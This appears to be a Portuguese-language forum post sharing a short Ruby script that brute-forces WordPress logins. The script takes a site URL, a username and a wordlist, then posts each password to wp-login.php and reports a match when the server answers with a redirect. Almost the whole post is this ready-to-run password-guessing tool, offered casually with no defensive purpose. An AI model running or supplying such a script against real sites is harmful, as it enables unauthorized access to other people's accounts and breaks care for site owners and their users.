é um brute-force de wordpress >.< tava sem ideias
- Código:
#!/usr/bin/ruby
# By MMxM
require 'net/http'
unless ARGV.length == 3
puts "\n[*] Wordpress Brute-force \\o/ \n[-] tava sem ideia mais queria fazer algo em ruby >.<\n\n[*] Modo de uso: ./wp.rb <site> <usuario> <wordlist>\n[-] Exemplo: ./wp.rb http://localhost/wp-login.php mmxm wordlist.txt\n"
exit
end
site = ARGV[0]
user = ARGV[1]
wl = ARGV[2]
if !File.file?(wl)
abort("Error")
end
print "\n\n[*] Attacking: ",site,"\n\n[-] User: ",user,"\n\n"
File.open(wl, 'r') do |f1|
while line = f1.gets
uri = URI(site)
res = Net::HTTP.post_form(uri, 'log' => user, 'pwd' => line, 'wp-submit' => 'Log in' )
if res.code == "302"
print "[*] Password found: ",line
print "\n[-] Password is ",line.chomp," and user is ",user,"\n\n"
exit
else
print "[-] Testando ...",line
end
end
end
print "\n[-] No passwords found !!!\n\n"